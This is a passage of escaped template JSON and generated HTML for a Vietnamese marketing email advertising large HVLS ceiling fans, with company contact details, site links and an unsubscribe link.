S<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"rktmzZAX4g\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"28%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"2px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#ca979a\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_4\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"tIS5FWVh8R\\\",\\\"type\\\":\\\"social\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"icons\\\":{\\\"iconType\\\":\\\"rounded\\\",\\\"icons\\\":[{\\\"url\\\":\\\"https:\\/\\/pinterest.com\\/\\\",\\\"name\\\":\\\"Pinterest\\\"},{\\\"url\\\":\\\"https:\\/\\/youtube.com\\/\\\",\\\"name\\\":\\\"YouTube\\\"},{\\\"url\\\":\\\"https:\\/\\/instagram.com\\/\\\",\\\"name\\\":\\\"Instagram\\\"},{\\\"url\\\":\\\"https:\\/\\/soundcloud.com\\/\\\",\\\"name\\\":\\\"SoundCloud\\\"}],\\\"editor\\\":{\\\"data\\\":{\\\"showDefaultIcons\\\":true,\\\"showDefaultOptions\\\":true,\\\"customIcons\\\":[],\\\"customOptions\\\":[]}}},\\\"align\\\":\\\"center\\\",\\\"spacing\\\":14,\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_social_1\\\",\\\"htmlClassNames\\\":\\\"u_content_social\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"_0AZ9YXbqQ\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_10\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"9crVUjvdBt\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h3\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Arial Black\\\",\\\"value\\\":\\\"arial black,AvenirNext-Heavy,avant garde,arial\\\",\\\"url\\\":\\\"\\\",\\\"defaultFont\\\":true},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"18px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_5\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"The World\\u2019s Most Efficient Ceiling Fan\\\"}},{\\\"id\\\":\\\"ozkROz9f_1\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"150%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_10\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 150%;\\\\\\\">-------o0o------<\\/p>\\\\n<p style=\\\\\\\"line-height: 150%;\\\\\\\">\\u2198\\ufe0f Office &amp; Showroom: 304 Tr\\u01b0\\u01a1ng V\\u0103n Bang, Th\\u1ea1nh M\\u1ef9 L\\u1ee3i, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp H\\u1ed3 Ch\\u00ed Minh.<\\/p>\\\\n<p style=\\\\\\\"line-height: 150%;\\\\\\\">\\ud83d\\udc8c Email: sale@hogiaphat.vn<\\/p>\\\\n<p style=\\\\\\\"line-height: 150%;\\\\\\\">\\u260e\\ufe0f T\\u01b0 v\\u1ea5n B\\u00e1n H\\u00e0ng: 0913 123860<\\/p>\\\\n<p style=\\\\\\\"line-height: 150%;\\\\\\\">\\ud83d\\udcde Hotline: 028 730 333 69<\\/p>\\\\n<p style=\\\\\\\"line-height: 150%;\\\\\\\">\\u00a0<\\/p>\\\\n<p style=\\\\\\\"line-height: 150%;\\\\\\\">\\u00a0\\u25b9\\u25b9\\u25b9Tổ chức đào tạo WIT\\/H\\u1ed3 Gia Ph\\u00e1t \\u25b9\\u25b9\\u25b9<\\/p>\\\\n<p style=\\\\\\\"line-height: 150%;\\\\\\\">\\u2705 Mang \\u0111\\u1ebfn gi\\u1ea3i ph\\u00e1p qu\\u1ea1t l\\u00e0m m\\u00e1t ti\\u1ec7n nghi &amp; tr\\u1ea3i nghi\\u1ec7m t\\u1ed1t h\\u01a1n cho gia \\u0111\\u00ecnh nh\\u00e0 \\u1edf ho\\u1eb7c doanh nghi\\u1ec7p c\\u1ee7a b\\u1ea1n<\\/p>\\\\n<p style=\\\\\\\"line-height: 150%;\\\\\\\">\\u2622\\ufe0f D\\u00e0nh cho nh\\u00e0 x\\u01b0\\u1edfng, c\\u00f4ng nghi\\u1ec7p, v\\u0103n ph\\u00f2ng th\\u01b0\\u01a1ng m\\u1ea1i, nh\\u00e0 \\u1edf cao c\\u1ea5p.<\\/p>\\\\n<p style=\\\\\\\"line-height: 150%;\\\\\\\">\\u267b\\ufe0f\\u00a0 S\\u1ef1 quan t\\u00e2m c\\u1ee7a ch\\u00fang t\\u00f4i l\\u00e0 s\\u1eed d\\u1ee5ng n\\u0103ng l\\u01b0\\u1ee3ng hi\\u1ec7u qu\\u1ea3.\\u00a0<\\/p>\\\\n<p style=\\\\\\\"line-height: 150%;\\\\\\\">\\ud83c\\udf10\\u00a0<a href=\\\\\\\"https:\\/\\/www.bigfans.vn\\/\\\\\\\">https:\\/\\/www.bigfans.vn<\\/a><\\/p>\\\\n<p style=\\\\\\\"line-height: 150%;\\\\\\\">\\ud83c\\udf10\\u00a0<a href=\\\\\\\"https:\\/\\/quattran.co\\/\\\\\\\">https:\\/\\/quattran.co<\\/a><\\/p>\\\",\\\"hideMobile\\\":false,\\\"_override\\\":{\\\"mobile\\\":{\\\"lineHeight\\\":\\\"150%\\\",\\\"fontSize\\\":\\\"14px\\\"}}},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_8\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_7\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"UkkBWxvzv8\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"otIuyp2NLU\\\",\\\"contents\\\":[{\\\"id\\\":\\\"3YxPW0zruG\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_11\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">Too many emails?\\u00a0 <a rel=\\\\\\\"noopener\\\\\\\" href=\\\\\\\"%unsubscribe_url%\\\\\\\" target=\\\\\\\"_blank\\\\\\\" data-u-link-value=\\\\\\\"eyJuYW1lIjoid2ViIiwiYXR0cnMiOnsiaHJlZiI6Int7aHJlZn19IiwidGFyZ2V0Ijoie3t0YXJnZXR9fSJ9LCJ2YWx1ZXMiOnsiaHJlZiI6IiV1bnN1YnNjcmliZV91cmwlIiwidGFyZ2V0IjoiX2JsYW5rIn19\\\\\\\"><span style=\\\\\\\"text-decoration: underline; font-size: 14px; line-height: 19.6px;\\\\\\\">Unsubscribe<\\/span><\\/a><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_7\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#a47e6b\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_6\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"headers\\\":[],\\\"footers\\\":[],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":630,\\\"fontFamily\\\":{\\\"label\\\":\\\"Arial\\\",\\\"value\\\":\\\"arial,helvetica,sans-serif\\\"},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"cover\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":16}\"', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 650px) {\\r\\n  .u-row {\\r\\n    width: 630px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-50 {\\r\\n    width: 315px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 630px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 650px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\nbody {\\r\\n  margin: 0;\\r\\n  padding: 0;\\r\\n}\\r\\n\\r\\ntable,\\r\\ntr,\\r\\ntd {\\r\\n  vertical-align: top;\\r\\n  border-collapse: collapse;\\r\\n}\\r\\n\\r\\np {\\r\\n  margin: 0;\\r\\n}\\r\\n\\r\\n.ie-container table,\\r\\n.mso-container table {\\r\\n  table-layout: fixed;\\r\\n}\\r\\n\\r\\n* {\\r\\n  line-height: inherit;\\r\\n}\\r\\n\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\ntable, td { color: #000000; } #u_body a { color: #0000ee; text-decoration: underline; } @media (max-width: 480px) { #u_content_text_deprecated_3 .v-color { color: #236fa1 !important; } #u_content_text_10 .v-font-size { font-size: 14px !important; } #u_content_text_10 .v-line-height { line-height: 150% !important; } }\\r\\n    <\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Playfair+Display:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Crimson+Text:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Cabin:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #ecf0f1;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table id=\\\"u_body\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #ecf0f1;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #ecf0f1;\\\"><![endif]-->\\r\\n    \\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 630px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:630px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"630\\\" style=\\\"background-color: #ffffff;width: 630px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 630px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ffffff;height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 10px 5px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677161242918-sunon_logo.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 32%;max-width: 195.2px;\\\" width=\\\"195.2\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677161813458-Taiwan_Excellence-300.png\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 13%;max-width: 79.3px;\\\" width=\\\"79.3\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px 15px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-color v-line-height v-font-size\\\" style=\\\"font-family: \'Lato\',sans-serif; font-size: 14px; font-weight: 700; color: #302828; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><span style=\\\"font-family: inherit; line-height: 19.6px;\\\"><strong><span style=\\\"line-height: 30.8px; font-size: 22px;\\\">Qu\\u1ea1t treo tr\\u1ea7n c\\u00e1nh l\\u1edbn HVLS - s\\u1eed d\\u1ee5ng trong kh\\u00f4ng gian nh\\u00e0 \\u1edf, v\\u0103n ph\\u00f2ng, nh\\u00e0 m\\u00e1y c\\u00f4ng nghi\\u1ec7p<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 630px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:630px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"315\\\" style=\\\"width: 315px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 315px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677162634107-sunon_ps1_.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 315px;\\\" width=\\\"315\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"315\\\" style=\\\"background-color: #ffffff;width: 315px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 315px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ffffff;height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" 